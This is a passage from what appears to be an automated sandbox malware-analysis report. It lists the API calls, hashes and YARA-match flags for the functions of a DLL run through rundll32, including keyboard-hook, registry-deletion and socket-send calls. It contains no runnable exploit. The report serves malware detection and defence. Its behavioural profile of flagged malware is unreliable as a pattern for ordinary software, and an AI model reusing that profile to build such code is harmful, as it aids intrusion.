                                                                                                                      • Opcode Fuzzy Hash: c2f9d16966c3e05c0f00d4b6f85f81d85042d6ca8df7dc6027e25f19a9a67901
                                                                                                                      • Instruction Fuzzy Hash: 1B31C072A00216DFEB10CF78DDCAAAE7BA5EB44645F15052AE506EF2C1EA31E9448750
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 10023B2B
                                                                                                                      • GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
                                                                                                                      • OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2429671754-3916222277
                                                                                                                      • Opcode ID: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                      • Instruction ID: e2743fe1d96de1c748b152781f443ff04db9fb8b7a9177862e5f836bc5268938
                                                                                                                      • Opcode Fuzzy Hash: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                      • Instruction Fuzzy Hash: 5A41AD38D01289DEDB11CFE4D951ADDFBF4EF18340F20816AE945EB292EB749A44CB11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
                                                                                                                      • GetSystemMetrics.USER32 ref: 10018D5B
                                                                                                                      • GetSystemMetrics.USER32 ref: 10018D62
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: System$Metrics$InfoParameters
                                                                                                                      • String ID: B$DISPLAY
                                                                                                                      • API String ID: 3136151823-3316187204
                                                                                                                      • Opcode ID: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                      • Instruction ID: a878fcb1cedf1c60654c719a4428af0d7f153658fed9e58891951680bc1a7591
                                                                                                                      • Opcode Fuzzy Hash: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                      • Instruction Fuzzy Hash: 7F119471900334EBDF11DF54AC8465A7BA8EF1A794F004061FE08AE086D270DB40CBD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Edit
                                                                                                                      • API String ID: 0-554135844
                                                                                                                      • Opcode ID: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                      • Instruction ID: d7da207644b64a2d982eb74dcfc255ba7c8492391b78acd90f64b6ebdbaccf44
                                                                                                                      • Opcode Fuzzy Hash: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                      • Instruction Fuzzy Hash: 5401C034B00222ABEA50DA35DC45B5AB6F9EF4E795F120524F512EE0A1DF70ECC1C666
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10023C61
                                                                                                                      • SendMessageA.USER32 ref: 10023CD9
                                                                                                                      • GetBkColor.GDI32(?), ref: 10023CE2
                                                                                                                      • GetTextColor.GDI32(?), ref: 10023CEE
                                                                                                                      • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 187318432-0
                                                                                                                      • Opcode ID: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                      • Instruction ID: d28fad7a3843e667b269742353e4bf680cf5f7ebce9377355bc1d9e2da6f7a14
                                                                                                                      • Opcode Fuzzy Hash: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                      • Instruction Fuzzy Hash: 99416A38400746DFCB20DF64D845A9EB7F1FF08310F618959F9969B2A1EB74E941CB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10016480
                                                                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
                                                                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 10016543
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 69039007-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetMapMode.GDI32(?), ref: 1002B3B9
                                                                                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC
                                                                                                                        • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
                                                                                                                        • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B420
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B42B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Mode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 696222070-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetMapMode.GDI32(?), ref: 1002B447
                                                                                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A
                                                                                                                        • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
                                                                                                                        • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B4AE
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B4B9
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Mode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 696222070-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10020407
                                                                                                                      • _memset.LIBCMT ref: 10020424
                                                                                                                      • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
                                                                                                                      • lstrcmpA.KERNEL32(00000000,?), ref: 10020450
                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 1002045C
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      Similarity
                                                                                                                      • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 289641511-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 10032A0A
                                                                                                                        • Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
                                                                                                                        • Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
                                                                                                                        • Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158
                                                                                                                        • Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124
                                                                                                                      • __freefls@4.LIBCMT ref: 10032A60
                                                                                                                        • Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
                                                                                                                      • ExitThread.KERNEL32 ref: 10032A39
                                                                                                                      • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2731880238-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2
                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 1001295E
                                                                                                                      • SetWindowLongA.USER32 ref: 10012989
                                                                                                                        • Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A
                                                                                                                      Similarity
                                                                                                                      • API ID: LongMenuWindow$AppendSystem
                                                                                                                      • String ID: 192.168.3.85$Message
                                                                                                                      • API String ID: 4121476972-856608562
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                        • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                        • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 100130B2
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                      • _strcat.LIBCMT ref: 1001310A
                                                                                                                        • Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB
                                                                                                                      • send.WS2_32(?,?,00000064,00000000), ref: 10013195
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
                                                                                                                      • String ID: :
                                                                                                                      • API String ID: 16450322-3653984579
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                        • Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                        • Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                        • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                        • Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 1001C1F4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                      • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                      • API String ID: 3274081130-63838506
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 100026FF
                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 1000272B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2459298410-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 365290523-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rect$DesktopVisible
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1055025324-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 1002C6E7
                                                                                                                        • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                      • GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 1002C733
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 26245289-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
                                                                                                                      • __isleadbyte_l.LIBCMT ref: 1003E1C5
                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
                                                                                                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3058430110-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10026510
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetDC.USER32(?), ref: 1002658E
                                                                                                                      • IntersectRect.USER32(?,?,?), ref: 100265C8
                                                                                                                      • CreateRectRgnIndirect.GDI32(?), ref: 100265D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3511876931-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: __msize_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1288803200-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1002EB3E
                                                                                                                      • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
                                                                                                                      • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePeek$H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3998274959-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 100160AF
                                                                                                                        • Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
                                                                                                                        • Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2
                                                                                                                      • SetEvent.KERNEL32(?,00000060), ref: 1001615C
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001616C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1532457625-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CharNextA.USER32(?), ref: 10022C6D
                                                                                                                        • Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99
                                                                                                                      • CharNextA.USER32(00000000), ref: 10022C8A
                                                                                                                      • _strtol.LIBCMT ref: 10022CB5
                                                                                                                      • _strtoul.LIBCMT ref: 10022CBC
                                                                                                                        • Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4211061542-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: ArrayDestroyFreeSafeTask
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253174383-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$EqualH_prolog3Intersect
